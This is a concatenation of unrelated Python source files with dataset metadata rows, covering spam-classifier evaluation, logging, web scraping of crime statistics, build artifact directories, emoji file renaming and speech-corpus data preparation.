| 38.742754 | 79 | 0.506219 | 1,131 | 10,693 | 4.655172 | 0.186561 | 0.039316 | 0.019753 | 0.011396 | 0.317569 | 0.25622 | 0.174169 | 0.135423 | 0.128965 | 0.098196 | 0 | 0.002116 | 0.381277 | 10,693 | 275 | 80 | 38.883636 | 0.793682 | 0.055363 | 0 | 0.288991 | 0 | 0 | 0.076296 | 0 | 0 | 0 | 0 | 0.003636 | 0 | 1 | 0.091743 | false | 0.004587 | 0.055046 | 0 | 0.178899 | 0.004587 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fb2b70fbc9290230d966266f41cc0cdba01ff0 | 2,317 | py | Python | 02 SRC/nbevaluate.py | addyg/Filter-Spam-NLP | 107412f4d76e239bb3b7762af239813f6b8ec55c | [
"Apache-2.0"
] | null | null | null | 02 SRC/nbevaluate.py | addyg/Filter-Spam-NLP | 107412f4d76e239bb3b7762af239813f6b8ec55c | [
"Apache-2.0"
] | null | null | null | 02 SRC/nbevaluate.py | addyg/Filter-Spam-NLP | 107412f4d76e239bb3b7762af239813f6b8ec55c | [
"Apache-2.0"
] | null | null | null |
class eval:
def __init__(self):
self.metric = {}
for label in 'spam', 'ham':
# true positive, true negative, false negative, false positive
for condition in 'tp', 'tn', 'fn', 'fp':
self.metric[label + '_' + condition] = 0.0
def confusion_mat(self, act, pred):
if act == 'spam' and pred == 'spam':
self.metric['spam' + '_' + 'tp'] += 1
self.metric['ham' + '_' + 'tn'] += 1
elif act == 'spam' and pred == 'ham':
self.metric['spam' + '_' + 'fn'] += 1
self.metric['ham' + '_' + 'fp'] += 1
elif act == 'ham' and pred == 'spam':
self.metric['spam' + '_' + 'fp'] += 1
self.metric['ham' + '_' + 'fn'] += 1
else:
self.metric['spam' + '_' + 'tn'] += 1
self.metric['ham' + '_' + 'tp'] += 1
def calculate(self):
# Read predicted label, and ground truth label
with open("nboutput.txt", "r", encoding="latin1") as f:
lines = f.readlines()
for line in lines:
label, path = line.split('\t')
if label in path:
self.confusion_mat(label, label)
else:
if label == 'ham':
self.confusion_mat('spam', label)
else:
self.confusion_mat('ham', label)
# print(self.metric)
# Output Precision, Recall, and F1 Score
for label in 'spam', 'ham':
# precision = tp/(tp + fp)
# recall = tp/(tp + fn)
recall, precision, f1_score = 0, 0, 0
if self.metric[label + '_' + 'tp'] != 0:
recall = self.metric[label + '_' + 'tp']/(self.metric[label + '_' + 'tp'] + self.metric[label + '_' + 'fn'])
precision = self.metric[label + '_' + 'tp']/(self.metric[label + '_' + 'tp']+ self.metric[label + '_' + 'fp'])
f1_score = 2 * (precision * recall) / (precision + recall)
print(label + ' precision' + ' =', round(precision, 2))
print(label + ' recall' + ' =', round(recall, 2))
print(label + ' F1 score' + ' =', round(f1_score, 2))
if __name__ == '__main__':
obj = eval()
obj.calculate()
| 32.633803 | 126 | 0.457057 | 248 | 2,317 | 4.129032 | 0.245968 | 0.175781 | 0.117188 | 0.083008 | 0.177734 | 0.144531 | 0.095703 | 0.095703 | 0.095703 | 0.095703 | 0 | 0.016495 | 0.372033 | 2,317 | 70 | 127 | 33.1 | 0.687285 | 0.090634 | 0 | 0.116279 | 0 | 0 | 0.090086 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0 | 0 | 0 | 0.093023 | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fb79c8deb31d7284ff35c642ba478b5e97080e | 5,321 | py | Python | src/enbackup/log.py | ensoft/enbackup | 56d1ed48692269ecfa5799656f90f70663645e5f | [
"MIT"
] | null | null | null | src/enbackup/log.py | ensoft/enbackup | 56d1ed48692269ecfa5799656f90f70663645e5f | [
"MIT"
] | null | null | null | src/enbackup/log.py | ensoft/enbackup | 56d1ed48692269ecfa5799656f90f70663645e5f | [
"MIT"
] | null | null | null | ###############################################################################
# log.py - enbackup logging support
#
# September 2012, Jim M
#
# Copyright (c) 2012 by Ensoft Ltd. All right reserved
#
# Version 1.0 - Initial version
###############################################################################
#
# This module provides a Logger class which provides several levels of logging,
# in increasing order of importance:
# - Debug
# - Log
# - Error
#
# A user of the module creates a logger, optionally specifying a log file
# and a debug file. If no debug file is specified then a default is
# used; if no log file is specified then messages are only printed to the
# debug file.
#
# The behavior is then:
# - Debug: prints messages to the debug file only.
# - Log: prints messages to the debug file and log file (if specified)
# - Error: prints messages to the debug file, log file, and stderr.
#
import os
import sys
import logging
import tempfile
from enbackup.utils import run_cmd_output, FileLock, chown_enbackup
default_format = \
"%(asctime)s %(levelname)-6s %(process)6d [%(name)-8s]: %(message)s"
default_log_dir = "/var/log/enbackup/"
default_debugfile = "enbackup.debug"
logging_lockfile = "enbackup.log.lock"
class EnbackupFileHandler(logging.FileHandler):
def _open(self):
#
# Call the standard handler, and then change the file ownership
# to enbackup:
#
retval = logging.FileHandler._open(self)
chown_enbackup(self.baseFilename)
return retval
class Logger(object):
logfile = None
debugfile = None
def __init__(self, name, logfile=None, debugfile=None):
#
# We support logging messages to up to two different files;
# one for log messages, and one for debug. We add filters
# to the handlers to ensure only messages of the desired
# verbosity get sent to each target.
#
self.logger = logging.getLogger(name)
self.logger.setLevel(logging.DEBUG)
self.formatter = logging.Formatter(default_format)
if not os.path.exists(default_log_dir):
os.makedirs(default_log_dir)
chown_enbackup(default_log_dir)
#
# Log messages go to the specified log file, if any
#
if logfile != None:
self.logfile = default_log_dir + logfile
self.handler = EnbackupFileHandler(self.logfile)
self.handler.setFormatter(self.formatter)
self.handler.setLevel(logging.INFO)
self.logger.addHandler(self.handler)
#
# Debug and Log messages go to the specified debugfile,
# or the default enbackup debugfile if none was provided.
#
if debugfile == None:
debugfile = default_debugfile
self.debugfile = default_log_dir + debugfile
self.debughandler = EnbackupFileHandler(self.debugfile)
self.debughandler.setFormatter(self.formatter)
self.debughandler.setLevel(logging.DEBUG)
self.logger.addHandler(self.debughandler)
#
# Add a handler for printing error messages to stderr.
# Note these will also get recorded in the debug and log
# files.
#
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.ERROR)
handler.setFormatter(logging.Formatter("%(message)s"))
self.logger.addHandler(handler)
#
# Grab a lock while actually emitting a log message, since the
# logging infra is not multi-process-safe.
#
def log(self, msg):
"""
Log a message.
The message will get recorded in the log file and the debug file
"""
with FileLock("Logging from PID {0}".format(os.getpid()),
logging_lockfile):
self.logger.info(msg)
def debug(self, msg):
"""
Print a debug message
The message will get recorded in the debug file
"""
with FileLock("Debug from PID {0}".format(os.getpid()),
logging_lockfile):
self.logger.debug(msg)
def error(self, msg):
"""
Print an error message
The message will get recorded in the debug file and the log file,
and printed to stderr.
"""
with FileLock("Error from PID {0}".format(os.getpid()),
logging_lockfile):
self.logger.error(msg)
def send_email(self, subject, body, to_address):
"""
Send an email to the supplied body to the specified address, logging
any errors that are hit.
"""
with tempfile.NamedTemporaryFile() as tmpfile:
tmpfile.write(body)
tmpfile.seek(0)
mail_cmd = ["mail",
"-s", "enbackup: " + subject,
to_address]
(rc, output, err) = run_cmd_output(mail_cmd,
self,
cmd_stdin=tmpfile.fileno())
if rc != 0:
self.error("Failed to send email to {0}, return code {1}:\n"
"{1}\n{2}".format(to_address, rc, output, err))
| 32.845679 | 79 | 0.583349 | 617 | 5,321 | 4.965964 | 0.290113 | 0.026436 | 0.027415 | 0.018277 | 0.164817 | 0.133159 | 0.08812 | 0.08812 | 0.076044 | 0.076044 | 0 | 0.005951 | 0.305206 | 5,321 | 161 | 80 | 33.049689 | 0.822829 | 0.323435 | 0 | 0.044776 | 0 | 0.014925 | 0.077631 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089552 | false | 0 | 0.074627 | 0 | 0.238806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fb976cf89d57e63861aa6fb361d456458b71f9 | 4,699 | py | Python | crimegrade_scraper.py | DariHernandez/crimegrade-scraper | ffc08b7a14d414c97013b64b4ca549b9dfd4045f | [
"MIT"
] | null | null | null | crimegrade_scraper.py | DariHernandez/crimegrade-scraper | ffc08b7a14d414c97013b64b4ca549b9dfd4045f | [
"MIT"
] | null | null | null | crimegrade_scraper.py | DariHernandez/crimegrade-scraper | ffc08b7a14d414c97013b64b4ca549b9dfd4045f | [
"MIT"
] | null | null | null | import os
import time
import log
import config
import globals
import requests
from database.postgresql import PostgreSQL
from scraping_manager.automate import Web_scraping
def scraper ():
"""
Main function of the scraper.
Extract data and save it in database
"""
# First instance of data base class
server = config.get_credential("db_server")
database = config.get_credential("db_name")
user = config.get_credential("db_user")
password = config.get_credential("db_password")
globals.db_manager = PostgreSQL(server,
database,
user,
password)
# Create table
output_table = str(config.get_credential ("output_table")).lower()
tables = globals.db_manager.get_tables_names()
if (output_table,) in tables:
globals.db_manager.truncate_table(output_table)
log.info(f"Table {output_table} truncated", print_text=True)
else:
columns = [
["Assault", "numeric"],
["Robbery", "numeric"],
["Rape", "numeric"],
["Murder", "numeric"],
["Total_Violent_Crime", "varchar"],
["Theft", "numeric"],
["Vehicle_Theft", "numeric"],
["Burglary", "numeric"],
["Arson", "numeric"],
["Total_Property_Crime", "varchar"],
["Kidnapping", "numeric"],
["Drug_Crimes", "numeric"],
["Vandalism", "numeric"],
["Identity_Theft", "numeric"],
["Animal_Cruelty", "numeric"],
["Total_Other_Rate", "varchar"],
["zipcode", "integer"]
]
globals.db_manager.create_table(f"{output_table}", columns)
log.info(f"Table {output_table} created", print_text=True)
# Get zip codes
zipcodes = []
zipcodes_path = os.path.join(os.path.dirname(__file__), "zipcodes.txt")
with open (zipcodes_path, "r") as file:
zipcodes = file.readlines()
# Loop for each zip code in list
valid_rows = 0
zipcodes_num = len(zipcodes)
for zipcode in zipcodes:
# End program if global status is not running
if not globals.loading:
break
# Instance of selenium and load page
zipcode_formated = zipcode.replace("\n", "")
page = f"https://crimegrade.org/safest-places-in-{zipcode_formated}/"
scraper = Web_scraping(page, headless=True, user_agent=True)
# Logs and status
index = zipcodes.index(zipcode) + 1
log.update_status(f'Scraping zipcode {zipcode_formated} ({index} / {zipcodes_num})')
# Skip no found pages
h1 = scraper.get_text("h1")
if h1 == "No Results Found":
continue
tables_selectors = [
"p + .one_third",
".one_third + .one_third",
".one_third.et_column_last"
]
columns = []
values = []
for table_selector in tables_selectors:
# Get data for each table
selector_row_vcr = f"{table_selector} > .SummaryStats.mtr-table.mtr-tr-th tr"
rows_vcr = scraper.get_elems(selector_row_vcr)
# Loopf ro each row in table
for index_row in range(0, len(rows_vcr)+1):
title_selector = selector_row_vcr + f":nth-child({index_row}) > *:nth-child(1)"
value_selector = selector_row_vcr + f":nth-child({index_row}) > *:nth-child(2)"
title = str(scraper.get_text(title_selector)).strip().replace('"', "")
value = str(scraper.get_text(value_selector)).strip().replace('"', "")
# Clean data
sktip_tiles = [None, "Crime Type", "None"]
if title and value and not title in sktip_tiles:
title_formated = str(title).lower().replace(" ", "_")
title_formated = title_formated.replace('”', "").replace('“', "")
columns.append(title_formated)
values.append(value)
# Send data to database
globals.db_manager.insert_rows (output_table, columns, [values], nstring=False)
valid_rows += 1
# End browser
scraper.end_browser()
# End loading
globals.loading = False
globals.status += f"\nRows in database: {valid_rows}"
if __name__ == "__main__":
globals.loading = True
scraper() | 35.067164 | 95 | 0.546286 | 489 | 4,699 | 5.034765 | 0.355828 | 0.035743 | 0.038587 | 0.034119 | 0.070674 | 0.070674 | 0.03818 | 0.03818 | 0.03818 | 0.03818 | 0 | 0.003218 | 0.338583 | 4,699 | 134 | 96 | 35.067164 | 0.788932 | 0.08172 | 0 | 0 | 0 | 0 | 0.192155 | 0.024282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011111 | false | 0.022222 | 0.088889 | 0 | 0.1 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fbba13b6f826be2a093d678ee6c8d013aecc80 | 7,389 | py | Python | antlir/artifacts_dir.py | lhl2617/antlir | 1041732e8163c1316d3e45c0ba4db7937faa4809 | [
"MIT"
] | null | null | null | antlir/artifacts_dir.py | lhl2617/antlir | 1041732e8163c1316d3e45c0ba4db7937faa4809 | [
"MIT"
] | null | null | null | antlir/artifacts_dir.py | lhl2617/antlir | 1041732e8163c1316d3e45c0ba4db7937faa4809 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"DANGER: The resulting PAR will not work if copied outside of buck-out."
import os
import shutil
import stat
import subprocess
import sys
import textwrap
from typing import Optional
from .fs_utils import Path, populate_temp_file_and_rename
def _maybe_make_symlink_to_scratch(
symlink_path: Path,
target_in_scratch: Path,
target_in_repo: Path,
) -> Path:
"""
IMPORTANT: This must be safe against races with other concurrent copies
of `artifacts_dir.py`.
"""
scratch_bin = shutil.which("mkscratch")
if scratch_bin is None:
return symlink_path
target_path = Path(
subprocess.check_output(
[scratch_bin, "path", "--subdir", target_in_scratch, target_in_repo]
).rstrip()
)
# Atomically ensure the desired symlink exists.
try:
os.symlink(target_path, symlink_path)
except FileExistsError:
pass
# These two error conditions should never happen under normal usage, so
# they are left as exceptions instead of auto-remediations.
if not os.path.islink(symlink_path):
raise RuntimeError(
f"{symlink_path} is not a symlink. Clean up whatever is there "
"and try again?"
)
real_target = symlink_path.realpath()
if real_target != target_path:
raise RuntimeError(
f"{symlink_path} points at {real_target}, but should point "
f"at {target_path}. Clean this up, and try again?"
)
return target_path
def _first_parent_containing_sigil(
start_path: Path, sigil_name: str, is_dir: bool
) -> Optional[Path]:
root_path = start_path.abspath()
while True:
if root_path.realpath() == Path("/"): # No infinite loop on //
return None
maybe_sigil_path = root_path / sigil_name
if maybe_sigil_path.exists() and (
os.path.isdir(maybe_sigil_path)
if is_dir
else os.path.isfile(maybe_sigil_path)
):
return root_path
root_path = root_path.dirname()
def find_repo_root(path_in_repo: Optional[Path] = None) -> Path:
"""
Find the path of the VCS repository root. This could be the same thing
as `find_buck_cell_root` but importantly, it might not be. Buck has the
concept of cells, of which many can be contained within a single VCS
repository. When you need to know the actual root of the VCS repo, use
this method.
"""
# We have to start somewhere reasonable. If we don't get an explicit path
# start from the cwd and then the location of the binary being executed.
paths_to_try = (
[path_in_repo]
if path_in_repo
else [Path(os.getcwd()), Path(sys.argv[0]).dirname()]
)
for path_in_repo in paths_to_try:
repo_root = _first_parent_containing_sigil(
path_in_repo, ".hg", is_dir=True
) or _first_parent_containing_sigil(path_in_repo, ".git", is_dir=True)
if repo_root:
return repo_root
# If we got this far we never found the repo root
raise RuntimeError(
f"No hg or git root found in any ancestor of {paths_to_try}."
f" Is this an hg or git repo?"
)
def find_buck_cell_root(path_in_repo: Optional[Path] = None) -> Path:
"""
If the caller does not provide a path known to be in the repo, a reasonable
default of sys.argv[0] will be used. This is reasonable as binaries/tests
calling this library are also very likely to be in repo.
This is intended to work:
- under Buck's internal macro interpreter, and
- using the system python from `facebookincubator/antlir`.
This is functionally equivalent to `buck root`, but we opt to do it here as
`buck root` takes >2s to execute (due to CLI startup time).
"""
paths_to_try = (
[Path(path_in_repo)]
if path_in_repo
else [Path(os.getcwd()), Path(sys.argv[0])]
)
for path_in_repo in paths_to_try:
cell_path = _first_parent_containing_sigil(
path_in_repo, ".buckconfig", is_dir=False
)
if cell_path:
# Future: this should just use Path, but we have to finish
# converting all the downstream uses of this first
return cell_path
# If we got this far we never found the cell root
raise RuntimeError(
f"Could not find .buckconfig in any ancestor of {paths_to_try}"
)
def find_artifacts_dir(path_in_repo: Optional[Path] = None) -> Path:
"See `find_buck_cell_root`'s docblock to understand `path_in_repo`"
return find_buck_cell_root(path_in_repo=path_in_repo) / "buck-image-out"
def ensure_per_repo_artifacts_dir_exists(
path_in_repo: Optional[str] = None,
) -> Path:
"See `find_buck_cell_root`'s docblock to understand `path_in_repo`"
buck_cell_root = find_buck_cell_root(path_in_repo=path_in_repo)
artifacts_dir = find_artifacts_dir(path_in_repo=path_in_repo)
# On Facebook infra, the repo might be hosted on an Eden filesystem,
# which is not intended as a backing store for a large sparse loop
# device filesystem. So, we will put our artifacts in a blessed scratch
# space instead.
#
# The location in the scratch directory is a hardcoded path because
# this really must be a per-repo singleton.
real_dir = _maybe_make_symlink_to_scratch(
artifacts_dir, "buck-image-out", buck_cell_root
)
try:
os.mkdir(real_dir)
except FileExistsError:
pass # May race with another mkdir from a concurrent artifacts_dir.py
ensure_clean_sh_exists(artifacts_dir)
return artifacts_dir
def ensure_clean_sh_exists(artifacts_dir: Path) -> None:
clean_sh_path = artifacts_dir / "clean.sh"
with populate_temp_file_and_rename(
clean_sh_path, overwrite=True, mode="w"
) as f:
# We do not want to remove image_build.log because the potential
# debugging value far exceeds the disk waste
f.write(
textwrap.dedent(
"""\
#!/bin/bash
set -ue -o pipefail
buck clean
sudo umount -l buck-image-out/volume || true
rm -f buck-image-out/image.btrfs
# Just try to remove empty checkout dirs if they exist
# Leave any checkouts as they may still be mounted by Eden
REPOS="buck-image-out/eden/repos"
mkdir -p "$REPOS"
# Remove leftover lock files
find "$REPOS" -maxdepth 2 -depth -type f -print0 -path ".lock_*" | xargs -0 rm 2>/dev/null || true
# Remove empty checkout dirs
find "$REPOS" -maxdepth 2 -depth -type d -print0 | xargs -0 rmdir 2>/dev/null || true
if [ -d "$REPOS" ]; then
echo "Eden checkouts remain in $REPOS and were not cleaned up"
else
rm -rf buck-image-out/eden
fi
""" # noqa: E501
)
)
os.chmod(
clean_sh_path,
os.stat(clean_sh_path).st_mode
| (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH),
)
if __name__ == "__main__":
print(ensure_per_repo_artifacts_dir_exists())
| 34.208333 | 110 | 0.653674 | 1,068 | 7,389 | 4.315543 | 0.310861 | 0.031243 | 0.045563 | 0.020829 | 0.228249 | 0.206552 | 0.14233 | 0.100673 | 0.075071 | 0.062486 | 0 | 0.002968 | 0.270402 | 7,389 | 215 | 111 | 34.367442 | 0.851976 | 0.313304 | 0 | 0.169492 | 0 | 0 | 0.142556 | 0.010785 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059322 | false | 0.016949 | 0.067797 | 0 | 0.194915 | 0.008475 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fc7245178fc7e36b3d38eef13ccba6bb0bb7fc | 1,828 | py | Python | rename_emoji_with_shortcode.py | riseupgirls/noto-emoji | 77395c9c9f9eaed74e1f3e72ab51a5f99c95c39b | [
"Apache-2.0"
] | null | null | null | rename_emoji_with_shortcode.py | riseupgirls/noto-emoji | 77395c9c9f9eaed74e1f3e72ab51a5f99c95c39b | [
"Apache-2.0"
] | null | null | null | rename_emoji_with_shortcode.py | riseupgirls/noto-emoji | 77395c9c9f9eaed74e1f3e72ab51a5f99c95c39b | [
"Apache-2.0"
] | null | null | null | import os
import pathlib
import re
import shutil
import unidecode
from nototools import unicode_data
em_version = re.compile(r"^(\(emoji\) *)?E\d+(\.\d+)?")
new_to_old = {}
# this function is copied in generate_emoji_html
def shortcode(u_seq):
n = unicode_data.get_emoji_sequence_name(u_seq)
old = n
n = unidecode.unidecode(n)
n = re.sub(em_version, "", n)
n = n.replace("(emoji)", "")
n = n.lower().strip()
n = n.replace("*", "star")
n = n.replace(r"\x{23}", "number_sign")
n = n.replace("'", "")
n = n.replace('"', "")
n = n.replace(".", "_")
n = n.replace("(", "")
n = n.replace(")", "_")
n = n.replace(": ", "_")
n = n.replace(" & ", "_")
n = n.replace(" - ", "_")
n = n.replace("-", "_")
n = n.replace(", ", "_")
n = n.replace(" ", "_")
n = n.replace("__", "_")
if n in new_to_old:
raise Exception(
"We already have a file named: {}, it points on: {}".format(
n, new_to_old[n]
)
)
new_to_old[n] = old
return n
source = pathlib.Path("./build/compressed_pngs/").absolute()
destination = pathlib.Path("./build/release/emoji").absolute()
rename = set()
for f in source.iterdir():
if f.suffix != ".png":
continue
n = f.stem
n = n.split("_")[1:]
n[0] = n[0][1:]
n = tuple([int(i, base=16) for i in n])
n = shortcode(n)
rename.add((f.absolute(), pathlib.Path(n)))
destination.mkdir(parents=True, exist_ok=True)
os.chdir(destination)
for source, dest_name in rename:
dest_name = "{{" + source.stem + "}}{{" + dest_name.name + "}}"
dest = destination / dest_name
dest = dest.with_suffix(".png")
print(source, " ->", destination / dest)
shutil.copy(source, destination / dest)
# os.symlink(source.name, dest.name)
| 25.746479 | 72 | 0.556346 | 251 | 1,828 | 3.896414 | 0.378486 | 0.042945 | 0.138037 | 0.112474 | 0.129857 | 0.110429 | 0.110429 | 0.110429 | 0.110429 | 0.110429 | 0 | 0.00576 | 0.240153 | 1,828 | 70 | 73 | 26.114286 | 0.698344 | 0.044311 | 0 | 0.035088 | 0 | 0 | 0.114106 | 0.025803 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017544 | false | 0 | 0.105263 | 0 | 0.140351 | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fcee412493446a4ec498785af8d4f2dc9ddc76 | 20,027 | py | Python | egs/yoloxochitl_mixtec/asr1/local/data_prep.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
] | 5,053 | 2017-12-13T06:21:41.000Z | 2022-03-31T13:38:29.000Z | egs/yoloxochitl_mixtec/asr1/local/data_prep.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
] | 3,666 | 2017-12-14T05:58:50.000Z | 2022-03-31T22:11:49.000Z | egs/yoloxochitl_mixtec/asr1/local/data_prep.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
] | 1,709 | 2017-12-13T01:02:42.000Z | 2022-03-31T11:57:45.000Z | # -*- coding: UTF-8 -*-
from argparse import ArgumentParser
import os
import re
import shutil
import soundfile as sf
import string
import sys
from xml.dom.minidom import parse
s = "".join(chr(c) for c in range(sys.maxunicode + 1))
ws = "".join(re.findall(r"\s", s))
outtab = " " * len(ws)
trantab = str.maketrans(ws, outtab)
delset = string.punctuation
delset = delset.replace(":", "")
delset = delset.replace("'", "")
def TextRefine(text, text_format):
text = re.sub(r"\.\.\.|\*|\[.*?\]", "", text.upper())
delset_specific = delset
if text_format == "underlying_full":
remove_clear = "()=-"
for char in remove_clear:
delset_specific = delset_specific.replace(char, "")
return text.translate(str.maketrans("", "", delset_specific))
def ExtractAudioID(audioname, wav_spk_info=None):
if wav_spk_info:
for key in wav_spk_info.keys():
if key in audioname:
return key
else:
print("ERROR in audioname")
return "error"
def XMLRefine(input_xml, output_xml, readable=False):
if readable:
append = "\n"
else:
append = ""
sample_processing = open(input_xml, "r", encoding="iso-8859-1")
output = open(output_xml, "w", encoding="iso-8859-1")
stack = ""
stack_symbol = ""
while True:
line = sample_processing.readline()
if not line:
break
line = line.strip()
if stack != "":
if len(line) > 1 and line[0] == "<":
if line.startswith("<Who"):
continue
stack += "%s</%s>%s" % (append, stack_symbol, append)
output.write(stack)
if line[-2:] == "/>":
stack = line[:-2] + ">" + append
stack_symbol = line[1:].split(" ")[0]
else:
output.write(line + append)
stack, stack_symbol = "", ""
else:
stack += line
elif len(line) > 2 and line[-2:] == "/>":
stack += line[:-2] + ">" + append
stack_symbol = line[1:].split(" ")[0]
else:
output.write(line + append)
sample_processing.close()
output.close()
def XMLProcessing(transcribe):
DOMTree = parse(transcribe)
trans = DOMTree.documentElement
# get audio file information
if trans.hasAttribute("audio_filename"):
audio_filename = trans.getAttribute("audio_filename")
else:
print("audio_file error for %s" % transcribe)
return
# get speaker information
speaker_info = {}
speakers = trans.getElementsByTagName("Speakers")
if len(speakers) < 1:
print("no speaker found, deal individually")
else:
speakers = speakers[0]
for speaker in speakers.childNodes:
speaker_info[speaker.getAttribute("id")] = {
"name": speaker.getAttribute("name"),
"dialect": speaker.getAttribute("dialect"),
"scope": speaker.getAttribute("scope"),
"accent": speaker.getAttribute("accent"),
}
# process by episode/section/turn/sync
xml_text = []
episodes = trans.getElementsByTagName("Episode")
for episode in episodes:
sections = episode.getElementsByTagName("Section")
for section in sections:
section_list = []
turns = section.getElementsByTagName("Turn")
for turn in turns:
# read as individual speech
raw_speaker = turn.getAttribute("speaker")
if len(raw_speaker.split(" ")) > 1:
# print("continue in %s" % audio_filename)
continue
individual_speech = raw_speaker not in speaker_info.keys()
syncs = turn.getElementsByTagName("Sync")
comments = turn.getElementsByTagName("Comment")
# remove comment nodes
for child in comments:
turn.removeChild(child)
first, last = turn.firstChild, turn.lastChild
for sync in syncs:
text = sync.firstChild
if text is None:
if last.isSameNode(sync) and len(syncs) > 0:
section_list[-1].append(sync.getAttribute("time"))
continue
elif len(sync.childNodes) > 1:
# for combination of speakers
text = ""
for child in sync.childNodes:
text += child.data
else:
text = text.data
text = TextRefine(text)
text = text.translate(trantab)
start_time = sync.getAttribute("time")
if individual_speech:
spk = "None"
else:
spk = turn.getAttribute("speaker")
if first.isSameNode(sync):
if last.isSameNode(sync):
section_list.append(
[spk, text, start_time, turn.getAttribute("endTime")]
)
else:
section_list.append([spk, text, start_time])
else:
section_list[-1].append(start_time)
if last.isSameNode(sync):
section_list.append(
[spk, text, start_time, turn.getAttribute("endTime")]
)
else:
section_list.append([spk, text, start_time])
xml_text.extend(section_list)
for xml in xml_text:
if len(xml) != 4:
print("warning")
print(xml)
return audio_filename, speaker_info, xml_text
def PackZero(number, size=6):
return "0" * (size - len(str(number))) + str(number)
def LoadWavSpeakerInfo(info_file):
"""return dict of wav: spk_list"""
info_file = open(info_file, "r", encoding="utf-8")
raw_info = list(map((lambda x: x.split(",")), (info_file.read()).split("\n")))
wav_spk_info = {}
for mapping in raw_info:
if len(mapping) < 3:
continue
[wav, spk1, spk2] = mapping
wav_spk_info[wav] = [spk1]
if spk2 != "":
wav_spk_info[wav] += [spk2]
return wav_spk_info
def LoadSpeakerDetails(speaker_details):
spk_details = {}
spk_file = open(speaker_details, "r", encoding="utf-8")
content = spk_file.read()
last_names = re.findall(r"\\last_name (.*?)\n", content, re.S)
first_names = re.findall(r"\\first_name (.*?)\n", content, re.S)
codes = re.findall(r"\\code (.*?)\n", content, re.S)
assert len(last_names) == len(first_names) == len(codes)
for last, first, code in zip(last_names, first_names, codes):
spk_details["%s %s" % (" ".join(first.split()), " ".join(last.split()))] = code
return spk_details
def TimeOrderProcess(time_order_dom):
time_order = {}
time_slots = time_order_dom.getElementsByTagName("TIME_SLOT")
for time_slot in time_slots:
# convert to second based
time_order[time_slot.getAttribute("TIME_SLOT_ID")] = (
float(time_slot.getAttribute("TIME_VALUE")) / 1000
)
return time_order
def ELANProcess(afile, spk_info, spk_details, text_format):
try:
elan_content = parse(afile).documentElement
except Exception:
print("encoding failed %s" % afile)
return None
time_order = TimeOrderProcess(elan_content.getElementsByTagName("TIME_ORDER")[0])
tiers = elan_content.getElementsByTagName("TIER")
channels = ([], [])
for tier in tiers:
if tier.getAttribute("LINGUISTIC_TYPE_REF") not in [
"UtteranceType",
"Transcription",
]:
# only consider pure caption
continue
try:
spk_name = " ".join(tier.getAttribute("TIER_ID").strip().split())
if text_format == "surface":
if "SURFACE" not in spk_name:
continue
code = spk_details[spk_name[:-9]]
else:
if "SURFACE" in spk_name:
continue
code = spk_details[spk_name]
except Exception:
print("error speaker: %s" % tier.getAttribute("TIER_ID").strip())
continue
if code not in spk_info:
continue
channel = channels[spk_info.index(code)]
annotations = tier.getElementsByTagName("ANNOTATION")
for anno in annotations:
info = anno.getElementsByTagName("ALIGNABLE_ANNOTATION")[0]
start = time_order[info.getAttribute("TIME_SLOT_REF1")]
end = time_order[info.getAttribute("TIME_SLOT_REF2")]
text = ""
childs = info.getElementsByTagName("ANNOTATION_VALUE")[0].childNodes
for child in childs:
if child.firstChild is not None:
continue
text += child.firstChild.data
else:
text += child.data
text = TextRefine(text, text_format)
text = text.translate(trantab)
if len(text) < 1:
continue
if start == end:
continue
channel.append([start, end, text])
return channels
def TraverseData(
sound_dir,
annotation_dir,
target_dir,
mode,
speaker_info,
new_data_dir,
speaker_details,
text_format,
):
if not os.path.exists(target_dir):
os.makedirs(target_dir)
